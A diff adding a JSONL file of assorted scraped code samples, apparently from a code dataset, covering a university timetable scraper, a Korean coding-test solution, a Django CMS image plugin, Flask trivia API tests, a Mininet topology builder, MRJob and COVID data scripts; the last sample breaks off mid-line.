diff --git "a/2194.jsonl" "b/2194.jsonl" new file mode 100644--- /dev/null +++ "b/2194.jsonl" @@ -0,0 +1,585 @@ +{"seq_id":"383912425","text":"import constants\nimport requests\nimport lxml.html as html\nimport datetime\nimport os\nimport pickle\n\n\nclass Groups:\n def __init__(self, *group):\n self.group, *self.subgroup = ' '.join(group).split(' (', maxsplit=1)\n self.subgroup = ''.join(self.subgroup)\n\n if self.group == '':\n self.group = None\n\n if self.subgroup == '':\n self.subgroup = None\n else:\n self.subgroup = '(' + self.subgroup\n\n def __str__(self):\n if self.subgroup is None:\n return self.group\n elif self.group is None:\n return None\n else:\n return self.group + ' ' + self.subgroup\n\n def __eq__(self, other):\n if isinstance(other, Groups):\n return self.group == other.group and self.subgroup == other.subgroup\n else:\n raise TypeError(\"unsupported type(s) for operator ==: %s\" % type(other).__name__)\n\n def __contains__(self, item):\n if isinstance(item, Groups):\n return self.group == item.group and self.subgroup == item.subgroup\n else:\n raise TypeError(\"unsupported type(s) for operator in: %s\" % type(item).__name__)\n\n def full(self):\n if self.subgroup is None:\n return self.group\n elif self.group is None:\n return None\n else:\n return self.group + ' ' + self.subgroup\n\n\nclass SibFUTimetable:\n def __init__(self, group=None, url=constants.URL_TIMETABLES, local=True):\n if isinstance(group, Groups) or group is None:\n self.url = url\n self.group = group\n self.local = local\n self._timetable = None\n if self.group is not None:\n self._get_raw_timetable()\n else:\n raise TypeError(\"Arg group must be %s\" % type(Groups).__name__)\n\n def __get_request(self):\n if self.group is None:\n raise ValueError(\"Arg group is None\")\n \"\"\"\n Сайт СФУ самый лучший. Непонятно откуда у некоторых групп взялись плюсики.\n Поэтому в первом if обрабатываем исключительные группы\n \"\"\"\n # ВЦ16-03РТВ (1 подгруппа)\n # ВЦ15-03РТВ (1 подгруппа)\n # +1+подгруппа\n\n exceptions = (Groups('ВЦ16-03РТВ (1 подгруппа)'),\n Groups('ВЦ15-03РТВ (1 подгруппа)'))\n if self.group in exceptions:\n if self.group == exceptions[0]: # ВЦ16-03РТВ (1 подгруппа)\n return constants.TIMETABLE_REQUEST + 'ВЦ16-03РТВ+%28+1+подгруппа%29'\n elif self.group == exceptions[1]: # ВЦ15-03РТВ (1 подгруппа)\n return constants.TIMETABLE_REQUEST + 'ВЦ15-03РТВ+%28+1+подгруппа%29'\n if self.group.subgroup: # Если есть подгруппа\n group = self.group.full()\n else:\n group = self.group.group\n\n request = constants.TIMETABLE_REQUEST + group.replace('/', '%2F')\n\n return constants.TIMETABLE_REQUEST + \\\n group.replace('/', '%2F').replace('(', '%28').replace(' ', '+').replace(')', '%29')\n\n def __filename_parser(self):\n if self.group is None:\n raise ValueError(\"Arg group is None\")\n return self.group.full().replace(' ', '').replace('/', '').replace('-', '').replace(')', '').replace('(', '').upper()\n\n def write(self):\n if self.group is None:\n raise ValueError(\"Arg group is None\")\n if self._timetable is None:\n raise ValueError(\"Timetable is None. Nothing to write\")\n try:\n os.mkdir(os.getcwd() + '/timetables')\n except FileExistsError:\n pass\n filename = os.getcwd() + '/timetables/' + self.__filename_parser()\n\n with open(filename, 'wb') as file:\n pickle.dump(self._timetable, file)\n\n def read(self):\n if self.group is None:\n raise ValueError(\"Arg group is None\")\n filename = os.getcwd() + '/timetables/' + self.__filename_parser()\n\n with open(filename, 'rb') as file:\n self._timetable = pickle.load(file)\n\n def __get_raw_timetable(self):\n if self.group is None:\n raise ValueError(\"Arg group must be not None\")\n \"\"\"\n\n timetable[i][0] - День недели,'№', номер занятия\n timetable[N][2][i] - (нечетная) Название, тип, преподаватель, кабинет,\n где N такой, что timetable[N][0] - номер занятия.\n timetable[N][3][i] - (четная) Название, тип, преподаватель, кабинет, где N такой,\n что timetable[N][0] - номер занятия.\n Если IndexError, то одно и тоже занятие каждую неделю.\n\n Возвращает список, в котором можно получить любой элемент по индексу.\n timetable[Нечетная/Четная неделя(0-1)][День недели, пн-сб(0-5)][лента(0-6)]\n\n \"\"\"\n page = requests.get(self.__get_request())\n tree = html.fromstring(page.content)\n raw_timetable = tree.xpath(\"//table[@class=\\\"table timetable\\\"]/*\")\n\n raw_timetable.append('Воскресенье') # Для правильной работы алгоритма\n\n timetable_final = [[], []]\n tmp_tt_odd = []\n tmp_tt_even = []\n tmp = [[], []]\n for i in raw_timetable:\n try:\n current = i[0].text_content()\n except AttributeError:\n current = i\n if current in constants.DAYS_WEEK and current != 'Понедельник':\n\n # Нечетная неделя\n if not tmp[0]:\n timetable_final[0].append(constants.DAYOFF)\n else:\n timetable_final[0].append(tmp[0][:])\n # Четная неделя\n if not tmp[1]:\n timetable_final[1].append(constants.DAYOFF)\n else:\n timetable_final[1].append(tmp[1][:])\n\n tmp = [[], []]\n continue\n\n if current in constants.LESSON_TIME:\n tmp_tt_odd = []\n tmp_tt_even = []\n tmp_tt_odd.append(current) # добавляем номер занятия в начало\n tmp_tt_even.append(current) #\n\n if i[2].text_content() != '': # занятие на нечетной неделе\n for j in i[2]:\n if j.text_content() != '':\n tmp_tt_odd.append(j.text_content())\n if j.tail is not None: # в tail хранится тип занятия или None\n tmp_tt_odd.append(j.tail[1:]) # первый символ пробел\n else:\n tmp_tt_odd.pop()\n\n try:\n if i[3].text_content() != '': # занятие на четной неделе\n for j in i[3]:\n if j.text_content() != '':\n tmp_tt_even.append(j.text_content())\n if j.tail is not None: # в tail хранится тип занятия или None\n tmp_tt_even.append(j.tail[1:]) # первый символ пробел\n else:\n tmp_tt_even.pop()\n except IndexError: # если i[3] не существует, значит занятие на четной такое же, как и на нечетной\n for j in i[2]:\n if j.text_content() != '':\n tmp_tt_even.append(j.text_content())\n if j.tail is not None: # в tail хранится тип занятия или None\n tmp_tt_even.append(j.tail[1:]) # первый символ пробел\n if tmp_tt_odd:\n tmp[0].append(tmp_tt_odd[:])\n if tmp_tt_even:\n tmp[1].append(tmp_tt_even[:])\n if timetable_final:\n self._timetable = timetable_final\n else:\n self._timetable = None\n\n def _get_raw_timetable(self):\n if self.local:\n self.read()\n elif self.local is False:\n self.__get_raw_timetable()\n else:\n return False\n\n def get_groups(self):\n if self.local:\n filename = os.getcwd() + '/timetables/GROUPS'\n with open(filename, 'r') as file:\n return [Groups(i.rstrip()) for i in file.readlines()]\n if self.local is False:\n page = requests.get(self.url)\n\n tree = html.fromstring(page.content)\n raw_groups = tree.xpath(\".//div[@class=\\\"collapsed-content\\\"]/ul/li/a[@href]/text()\")\n\n return [Groups(i.replace('\\xa0', ' ')) for i in raw_groups]\n\n def get_day(self,\n week_number=datetime.datetime.today().isocalendar()[1],\n week_day=datetime.datetime.today().weekday()):\n if 0 <= week_day <= 5 and week_number >= 0:\n week_number = constants.ODD if week_number % 2 == 0 else constants.EVEN # 0 - нечетная, 1 четная недели\n try:\n return self._timetable[week_number][week_day]\n except IndexError:\n return None\n elif week_day == 6:\n return None\n else:\n raise ValueError('week_day must be in [0, 5] and week_number [0, ...) not %d, %d' % (week_day, week_number))\n\n def get_week(self, week_number=datetime.datetime.today().isocalendar()[1]):\n if week_number >= 0:\n week_number = constants.EVEN if week_number % 2 == 0 else constants.ODD\n try:\n return self._timetable[week_number]\n except IndexError:\n return None\n else:\n raise ValueError('week_number must be in [0, ...) not %d' % (week_number))\n\n def set_group(self, group):\n self.group = Groups(group)\n\n def save_groups(self, *groups):\n try:\n os.mkdir(os.getcwd() + '/timetables')\n except FileExistsError:\n pass\n filename = os.getcwd() + '/timetables/GROUPS'\n with open(filename, 'w') as file:\n for i in groups:\n if not isinstance(i, Groups):\n raise TypeError(\"%s is not Groups type\" % i)\n file.write(i.full() + '\\n')\n\n\ndef save_timetables_local():\n \"\"\"\n\n Моя функция личная. Что хочу, то и делаю\n\n \"\"\"\n groups = SibFUTimetable(local=False).get_groups()\n SibFUTimetable().save_groups(*groups)\n count = 0\n progress_cur = 0\n progress_to = len(groups) / 100\n\n for i in groups:\n SibFUTimetable(group=i, local=False).write()\n count += 1\n if count > (progress_to*progress_cur + 1):\n progress_cur += 1\n print(str(progress_cur) + '% (' + str(count) + '/' + str(len(groups)) + ')')\n\n# save_timetables_local()\n","sub_path":"sibfutimetable.py","file_name":"sibfutimetable.py","file_ext":"py","file_size_in_byte":11556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"1016383","text":"\"\"\"\n[문제]\n- 여행가 A는 N x N 크기의 정사각형 공간 위에 서 있습니다. \n 이 공간은 1 x 1 크기의 정사각형으로 나누어져 있습니다. \n 가장 왼쪽 위 좌표는 (1,1)이며, 가장 오른쪽 아래 좌표는 (N,N)에 해당합니다.\n 여행가 A는 '상,하,좌,우 방향으로 이동'할 수 있으며, 시작 좌표는 항상 (1,1)입니다. \n 우리 앞에는 여행가 A가 이동할 계획이 적힌 계획서가 놓여 있습니다. \n\n- 계획서에는 하나의 줄에 띄어쓰기를 기준으로 하여 L, R, U, D 중 하나의 문자가 반복적으로 \n 적혀 있습니다. 각 문자의 의미는 다음과 같습니다. \n > L : 왼쪽으로 한 칸 이동\n > R : 오른쪽으로 한 칸 이동\n > U : 위로 한 칸 이동\n > D : 아래로 한 칸 이동 \n\n- 이때 여행가 A가 N x N 크기의 정사각형 공간을 벗어나는 움직임은 무시됩니다. \n 예를 들어 (1,1)의 위치에서 L혹은 U를 만나면 무시됩니다. \n 1,1 | 1,2 | 1,3\n 2,1 | 2,2 | 2,3\n 3,1 | 3,2 | 3,3 \n\n (입력조건)\n - 첫째 줄에 공간의 크기를 나타내는 N이 주어집니다. ( 1<=N<=100 )\n - 둘째 줄에 여행가 A가 이동할 계획서 내용이 주어집니다. ( 1 <= 이동횟수 <= 100 )\n\n (출력조건)\n - 첫째 줄에 여행가 A가 최종적으로 도착할 지점의 좌표 (X,Y)를 공백을 기준으로 구분하여 출력합니다. \n\n # 입력 예시 \n 5 \n R R R U D D \n\n # 출력 예시 \n 3 4\n\n--------------------\n- 이 문제는 요구사항대로 충실히 구현하면 되는 문제입니다. \n- 일련의 명령에 따라서 개체를 차례대로 이동시킨다는 점에서 '시물레이션(Simulation) 유형'으로도 분류\n 되며 구현이 중요한 대표적인 문제 유형입니다. \n > 다만, 알고리즘 교재나 문제 풀이 사이트에 따라서 다르게 일컬을 수 있으므로 , \n 코딩 테스트에서의 시뮬레이션 유형, 구현 유형, 완전 탐색 유형은 서로 유사한 점이 많다는 정도로만 기억하면됨\n\n\n\"\"\"\n\n\n# N 입력 받기 \nn = int(input())\nx,y = 1,1\nplans = input().split()\n\n# L,R,U,D에 따른 이동방향 // 2차원 x,y 좌표 생각하기 \nd_row = [0,0,-1,1]\nd_column = [-1,1,0,0]\n\nmove_type = ['L','R','U','D']\n\nfor plan in plans:\n # 이동 후 좌표 구하기\n for i in range(len(move_type)):\n if plan == move_type[i]:\n nx = x + d_row[i]\n ny = y + d_column[i]\n # 공간을 벗어나는 경우 무시\n if nx < 1 or ny < 1 or nx > n or ny > n:\n continue\n # 이동 수행 \n x,y = nx,ny \n\n \nprint(f\"{x} , {y}\")\n\n\n\n\n","sub_path":"4장구현/1_상하좌우.py","file_name":"1_상하좌우.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212132674","text":"import os\nfrom cms.plugin_pool import plugin_pool\nfrom cms.plugin_base import CMSPluginBase\nfrom django.utils.translation import ugettext_lazy as _\nimport models\nfrom django.conf import settings\n\nfrom filer.settings import FILER_ADMIN_ICON_SIZES, FILER_PUBLICMEDIA_PREFIX, FILER_PRIVATEMEDIA_PREFIX, FILER_STATICMEDIA_PREFIX\n\nclass FilerImagePlugin(CMSPluginBase):\n model = models.FilerImage\n name = _(\"Image\")\n render_template = \"cmsplugin_filer_image/image.html\"\n text_enabled = True\n raw_id_fields = ('image',)\n admin_preview = False\n fieldsets = (\n (None, {\n 'fields': ('caption', 'image', 'image_url', 'alt_text', 'css_class',\n 'thumbnail_option',)\n }),\n ('advanced thumbnail option', {\n 'classes': ('collapse',),\n 'fields': ('use_autoscale', 'width', 'height',\n 'crop', 'upscale','float')\n }),\n ('More', {\n 'classes': ('collapse',),\n 'fields': ('free_link', 'page_link', 'description',)\n }), \n \n )\n \n def _get_thumbnail_size(self, context, instance):\n \"\"\"\n Return the size of the thumbnail that should be inserted\n \"\"\"\n \n placeholder_width = context.get('width', None)\n if instance.thumbnail_option:\n if instance.thumbnail_option.width:\n width = instance.thumbnail_option.width\n if instance.thumbnail_option.height:\n height = instance.thumbnail_option.height\n else:\n # height was not externally defined: use ratio to scale it by the width\n height = int( float(width)*float(instance.image.height)/float(instance.image.width) )\n elif instance.use_autoscale and placeholder_width:\n # use the placeholder width as a hint for sizing\n width = placeholder_width\n # height was not externally defined: use ratio to scale it by the width\n height = int( float(width)*float(instance.image.height)/float(instance.image.width) )\n else:\n if instance.width:\n width = instance.width\n else:\n width = instance.image.width\n if instance.height:\n height = instance.height\n if width == instance.image.width:\n # width was not externally defined: use ratio to scale it by the height\n width = int( float(height)*float(instance.image.width)/float(instance.image.height) )\n else:\n # height was not externally defined: use ratio to scale it by the width\n height = int( float(width)*float(instance.image.height)/float(instance.image.width) )\n return (width, height)\n \n def get_thumbnail(self, context, instance):\n if instance.image:\n width, height = self._get_thumbnail_size(context, instance)\n # build thumbnail options\n if instance.thumbnail_option:\n crop = instance.thumbnail_option.crop\n upscale = instance.thumbnail_option.upscale\n else:\n crop = instance.crop\n upscale = instance.upscale\n thumbnail_opts = {\n 'size': self._get_thumbnail_size(context, instance),\n 'crop': crop,\n 'upscale': upscale,\n }\n return instance.image.image.file.get_thumbnail(thumbnail_opts)\n \n def render(self, context, instance, placeholder):\n if instance.image:\n width, height = self._get_thumbnail_size(context, instance)\n thumbnail = self.get_thumbnail(context, instance)\n context.update({\n 'object':instance,\n 'link':instance.link,\n 'thumbnail': thumbnail,\n 'placeholder':placeholder\n })\n return context\n \n def icon_src(self, instance):\n if instance.image:\n # TODO: Find a cleaner way\n # Fake the context because it is not available at this stage\n # this will cause a bug when using autoscale\n thumbnail = self.get_thumbnail({}, instance)\n return thumbnail.url\n else:\n return os.path.normpath(u\"%s/icons/missingfile_%sx%s.png\" % (FILER_STATICMEDIA_PREFIX, 32, 32,))\nplugin_pool.register_plugin(FilerImagePlugin)\n","sub_path":"src/cmsplugin_filer_image/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"31778828","text":"import requests\n\nrespuesta_inicial = requests.get('http://api.fixer.io/latest')\nrespuesta_inicial = respuesta_inicial.json()\nmonedas = [respuesta_inicial['base']]\n\nfor nombre, valor in respuesta_inicial['rates'].items():\n monedas.append(nombre)\n\nprint('Tipos de moneda disponibles:')\nfor indice, nombre in enumerate(monedas):\n print('{}. {}'.format(indice + 1, nombre))\n\ninicio = int(input('Seleccione moneda de inicio: '))\nmoneda_inicio = monedas[inicio - 1]\n\nfinal = int(input('Seleccione moneda a convertir: '))\nmoneda_final = monedas[final - 1]\n\nmonto = float(input('Ingrese monto: '))\n\ntipo_cambio = requests.get('http://api.fixer.io/latest',\n params={'base': moneda_inicio})\ntipo_cambio = tipo_cambio.json()\nfactor_cambio = tipo_cambio['rates'][moneda_final]\n\nprint('Resultado: {}'.format(monto * factor_cambio))\n","sub_path":"clase3/fixer.py","file_name":"fixer.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"227555841","text":"import sys\nimport datetime\nfrom pathlib import Path \ncurrent_path = Path(__file__).absolute()\nabs_path = str(current_path.parent.parent)\nsys.path.append(abs_path)\n\nfrom capture import Capture\nfrom utils import to_date\n\ndef from_api_to_db(data_list, url, numero_captura):\n \n func = lambda datum: dict(\n id_proposicao= datum['codProposicao'],\n nome_proposicao= datum['nomeProposicao'],\n data_votacao= to_date(datum['dataVotacao'], '%d/%m/%Y'),\n data_captura= datetime.datetime.now(),\n url_captura= url,\n numero_captura= numero_captura\n )\n\n return map(func, data_list)\n\n\n\n\ndef urls_generator(capture, base_url):\n\n with capture.engine.connect() as conn:\n result = list(conn.execute(\"select MAX(numero_captura) \\\n from camara_v1.proposicoes_votadas_plenario\"))\n\n if result[0][0] is None:\n numero_captura = 1\n else:\n numero_captura = int(result[0][0]) + 1\n\n year = datetime.datetime.strftime(datetime.datetime.now(), '%Y')\n\n return base_url.format(year), numero_captura\n\ndef main():\n\n capture = Capture(schema='camara_v1')\n\n # capture data with this\n base_url = 'http://www.camara.leg.br/SitCamaraWS/Proposicoes.asmx/ListarProposicoesVotadasEmPlenario?ano={}&tipo='\n url, numero_captura = urls_generator(capture, base_url)\n print(url, numero_captura)\n try:\n capture.capture_data(url)\n except TypeError:\n print('Not Enough Data')\n return\n\n # get the list of dict for this table\n data_list = capture.data['proposicoes']['proposicao']\n data_list = capture.to_default_dict(data_list) \n data_list = from_api_to_db(data_list, url, numero_captura) \n capture.insert_data(data_list, table_name='proposicoes_votadas_plenario', \n if_exists='pass', key='id_proposicao')\n\nif __name__ == '__main__':\n main()\n","sub_path":"bigua/API/camara_v1/proposicoes_votadas_plenario.py","file_name":"proposicoes_votadas_plenario.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392914498","text":"import os\nimport sys\nfrom mininet.topo import Topo\nfrom mininet.net import Mininet\nfrom mininet.node import CPULimitedHost\nfrom mininet.link import TCLink\nfrom mininet.node import OVSController\nfrom mininet.node import Controller\nfrom mininet.node import RemoteController\nfrom mininet.cli import CLI\nsys.path.append(\"../../\")\nfrom pox.ext.jelly_pox import JELLYPOX\nfrom subprocess import Popen\nfrom time import sleep, time\nfrom random import randint\n\nclass JellyFishTop(Topo):\n ''' TODO, build your topology here'''\n def build(self):\n\n k = 10\n r = 5 #for switch to switch\n #k-r = for servers\n num_switches = 100\n num_servers = 100\n switch_neighbors = {}\n num_ports_used = [0 for i in range(100)]\n free_candidates = set([])\n break_links_set = set([])\n switches = []\n for i in range(num_switches) :\n switch_neighbors[i] = set([])\n for i in range(num_switches) :\n name = 's' + i\n switches[i]= self.addSwitch( name )\n free_candidates.add(i)\n for i in range(num_servers) :\n name = 'h' + i\n switches[i]= self.addSwitch( name )\n\n\n while (len(free_candidates) >= 2) :\n pair = random.sample(free_candidates,2)\n src = pair[0]\n dst = pair[1]\n if src == dst :\n continue #probably unneed, better safe than sorry\n if dst in switch_neighbors[src] :\n has_available_connections = False\n for available in free_candidates :\n if available not in switch_neighbors[src] :\n has_available_connections = True\n break\n if not has_available_connections :\n break_links_set.add(src)\n free_candidates.remove(src)\n continue\n\n self.addLink(switches[src], switches[dst])\n num_ports_used[src] += 1\n num_ports_used[dst] += 1\n if num_ports_used[src] == r :\n free_candidates.remove(src)\n if num_ports_used[dst] == r :\n free_candidates.remove(dst)\n switch_neighbors[src].add(dst)\n switch_neighbors[dst].add(src)\n\n break_links_set = free_candidates.union(break_links_set)\n for switch_i in break_links_set :\n while num_ports_used[switch_i] < (r-2) :\n random_switch_a = random.randint(num_switches)\n if random_switch_a in switch_neighbors[switch_i] :\n continue\n random_switch_b = random.sample(switch_neighbors[random_switch_a],1)\n if random_switch_b in switch_neighbors[switch_i] :\n continue\n self.delLink(switches[random_switch_a], switches[random_switch_b])\n self.addLink(switches[random_switch_a], switches[switch_i])\n self.addLink(switches[random_switch_b], switches[switch_i])\n num_ports_used[switch_i] += 2\n\n\n\n\n\n\n # leftHost = self.addHost( 'h1' )\n # rightHost = self.addHost( 'h2' )\n # leftSwitch = self.addSwitch( 's3' )\n # rightSwitch = self.addSwitch( 's4' )\n\n # # Add links\n # self.addLink( leftHost, leftSwitch )\n # self.addLink( leftSwitch, rightSwitch )\n # self.addLink( rightSwitch, rightHost )\n\n\ndef experiment(net):\n net.start()\n sleep(3)\n net.pingAll()\n net.stop()\n\ndef main():\n\ttopo = JellyFishTop()\n\tnet = Mininet(topo=topo, host=CPULimitedHost, link = TCLink, controller=JELLYPOX)\n\texperiment(net)\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"pox/pox/ext/build_topology_jelly.py","file_name":"build_topology_jelly.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"288759955","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUpDatabase(self, database_name):\n self.database_path = \"postgres://{}/{}\".format(\n 'postgres:1234@localhost:5432', database_name)\n setup_db(self.app, self.database_path)\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.empty_database_name = \"trivia_empty_test\"\n self.setUpDatabase(self.database_name)\n \n\n self.test_question = {\n 'question': 'Which Star Wars movie is the best?',\n 'category': 3,\n 'answer': 'The Last Jedi',\n 'difficulty': 1\n }\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories(self):\n res = self.client().get(\"/categories\")\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertTrue(data['categories'])\n self.assertTrue(len(data['categories']))\n\n def test_get_categories_not_found(self):\n # Switch to an empty database to test this specific scenario where there are no categories at all\n self.setUpDatabase(self.empty_database_name)\n\n res = self.client().get(\"/categories\")\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n self.setUpDatabase(self.database_name)\n\n def test_add_question(self):\n res = self.client().post('/questions/add', json=self.test_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n\n def test_get_question(self):\n res = self.client().get('/questions?page=1')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertTrue(data['questions'])\n\n def test_get_question_not_found(self):\n res = self.client().get('/questions?page=100')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n def test_get_question_by_category(self):\n res = self.client().get('/categories/0/questions?page=1')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertTrue(data['questions'])\n self.assertTrue(len(data['questions']))\n self.assertGreaterEqual(data['totalQuestions'], 0)\n self.assertGreaterEqual(data['currentCategory'], 0)\n\n\n def test_get_question_by_category_not_found(self):\n res = self.client().get('/categories/100/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n def test_delete_question(self):\n question = Question.query.first()\n question_id = question.id\n res = self.client().delete('/questions/' + str(question_id))\n data = json.loads(res.data)\n question = Question.query.get(question_id)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertFalse(question)\n\n def test_delete_question_not_found(self):\n question_id = 1000\n res = self.client().delete('/questions/' + str(question_id))\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n def test_search_question(self):\n res = self.client().post(\n '/questions/search',\n json={\n 'searchTerm': 'Star Wars'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n\n self.assertTrue(data['questions'])\n self.assertTrue(len(data['questions']))\n\n self.assertGreaterEqual(data['totalQuestions'], 0)\n self.assertGreaterEqual(data['currentCategory'], 0)\n\n def test_search_question_not_found(self):\n res = self.client().post(\n '/questions/search',\n json={\n 'searchTerm': 'Star Trek'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 400)\n self.assertFalse(data['success'])\n\n def test_play(self):\n res = self.client().post(\n '/quizzes',\n json={\n 'previous_questions': [],\n 'quiz_category': {\n 'id': '0',\n 'type': 'Science'\n }\n })\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertTrue(data['question'])\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"projects/02_trivia_api/starter/backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"77020705","text":"from mrjob.job import MRJob\nimport time\n\nclass PartA2(MRJob):\n\n def mapper(self, _, line):\n try:\n fields = line.split(',')\n raw_timestamp = int(fields[6])\n trxn_value = float(fields[3]) / 1000000000000000000\n year_month = time.strftime('%Y-%m', time.gmtime(raw_timestamp))\n yield (year_month, {'count': 1, 'trxn_value': trxn_value})\n except:\n pass\n\n def combiner(self, key, value):\n total_value = 0.0\n total_count = 0\n\n for val in value:\n total_count += val['count']\n total_value += val['trxn_value']\n\n result = { 'count': total_count, 'trxn_value': total_value }\n\n yield (key, result)\n\n def reducer(self, key, value):\n total_value = 0.0\n total_count = 0\n\n for val in value:\n total_count += val['count']\n total_value += val['trxn_value']\n\n avg_value = total_value / total_count\n\n yield (key, avg_value)\n\nif __name__ == '__main__':\n PartA2.JOBCONF = {'mapreduce.job.reduces': '4'}\n PartA2.run()\n\n#Code Ends\n","sub_path":"PartA/PartA_AverageTransactions.py","file_name":"PartA_AverageTransactions.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387605490","text":"import json\nimport os\nimport fnmatch\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nimport matplotlib.pyplot as pl\nimport statistics\nfrom srcs.load_dailydata import load_daydata\n\ndef dataframe_tojson(country, data):\n\tdata.to_json(f'{country}.json')\n\twith open(f'{country}.json', 'r') as f:\n\t\tstuff = json.load(f)\n\twith open(f'{country}.json', 'w') as f:\n\t\tjson.dump(stuff, f, indent=4)\n\nif __name__ == \"__main__\":\n\tall_days = list()\n\tfor file in os.listdir('daily-stats/'):\n\t\tif fnmatch.fnmatch(file, '*.json'):\n\t\t\tall_days.append(load_daydata(f\"daily-stats/{file}\"))\n\t\n\tall_data = pd.concat(all_days).groupby(['countryRegion', 'date']).sum()\n\tcountries_list = sorted(set(list(zip(*all_data.index))[0]))\n\t\n\t# countries_interest = ['Finland', 'Italy', 'Iran', 'US', 'Japan', 'South Korea']\n\t# countries_interest = ['Finland', 'France', 'UK', 'Germany', 'Belgium']\n\tcountries_interest = ['South Korea']\n\t# data_sets = list()\n\tfor country in countries_interest:\n\t\tnew = all_data.loc[country]\n\t\tl = len(new.index)\n\t\ti = range(l)\n\t\tnew['index'] = i\n\t\tnew = new.set_index(['index'])\n\t\tprint(new)\n\t# \tratios = list()\n\t# \tratios.append(1)\n\t# \tk = 1\n\t# \twhile k < len(new.index):\n\t# \t\tr = new['confirmed'][k]/new['confirmed'][k - 1]\n\t# \t\tratios.append(r)\n\t# \t\tk += 1\n\t\t# Prediction data filler\n\t\t# i = len(new['confirmed']) - 7\n\t\t# rats_conf = list()\n\t\t# rats_rec = list()\n\t\t# rats_dead = list()\n\t\t# while i < len(new['confirmed']):\n\t\t# \trats_conf.append(new['confirmed'][i]/new['confirmed'][i - 1])\n\t\t# \trats_rec.append(new['recovered'][i]/new['recovered'][i - 1])\n\t\t# \trats_dead.append(new['deaths'][i - 1]/new['confirmed'][i - 1])\n\t\t# \ti += 1\n\t\t# med_conf = statistics.median(rats_conf)\n\t\t# med_rec = statistics.median(rats_rec)\n\t\t# med_dead = statistics.median(rats_dead) + 1\n\t\t# print(f\"{country}:\\nConfirmed {med_conf} | Recovered {med_rec} | Deaths {med_dead}\")\n\t\t# start_date = new.index[-1]\n\t\t# end_date = dt.datetime.strptime(\"04/30/2020\", \"%m/%d/%Y\")\n\t\t# current = dict()\n\t\t# tmp_date = start_date\n\t\t# predict = list()\n\t\t# tmp_conf = new['confirmed'][-1]\n\t\t# tmp_rec = new['recovered'][-1]\n\t\t# tmp_dead = new['deaths'][-1]\n\t\t# while tmp_date < end_date:\n\t\t# \ttmp_date += dt.timedelta(days=1)\n\t\t# \tcurrent = dict()\n\t\t# \tcurrent['date'] = tmp_date\n\t\t# \tcurrent['confirmed'] = tmp_conf * med_conf\n\t\t# \tcurrent['deaths'] = tmp_dead * med_dead\n\t\t# \tcurrent['recovered'] = tmp_rec * med_rec\n\t\t# \tpredict.append(current)\n\t\t# \ttmp_conf = current['confirmed']\n\t\t# \ttmp_dead = current['deaths']\n\t\t# \ttmp_rec = current['recovered']\n\t\t# fut = pd.DataFrame(predict)\n\t\t# fut = fut.set_index('date')\n\t\t# new = pd.concat([new, fut])\n\t\t# dataframe_tojson(country, new)\n\t\t# print(new_rats)\n\t\t# new['ratio'] = ratios\n\t\t# data_sets.append(new)\n\t\n\t# Plottings\n\t# fig, ax = pl.subplots()\n\t# i = 0\n\t# while i < len(countries_interest):\n\t# \tax.step(data_sets[i].index, data_sets[i]['confirmed'], where='mid', label=f'{countries_interest[i]} Confirmed')\n\t# \tax.plot(data_sets[i].index, data_sets[i]['confirmed'], color='grey', alpha=0.3)\n\t# \tax.step(data_sets[i].index, data_sets[i]['recovered'], where='mid', label=f'{countries_interest[i]} Recovered')\n\t# \tax.plot(data_sets[i].index, data_sets[i]['recovered'], color='grey', alpha=0.3)\n\t# \tax.step(data_sets[i].index, data_sets[i]['deaths'], where='mid', label=f'{countries_interest[i]} Deaths')\n\t# 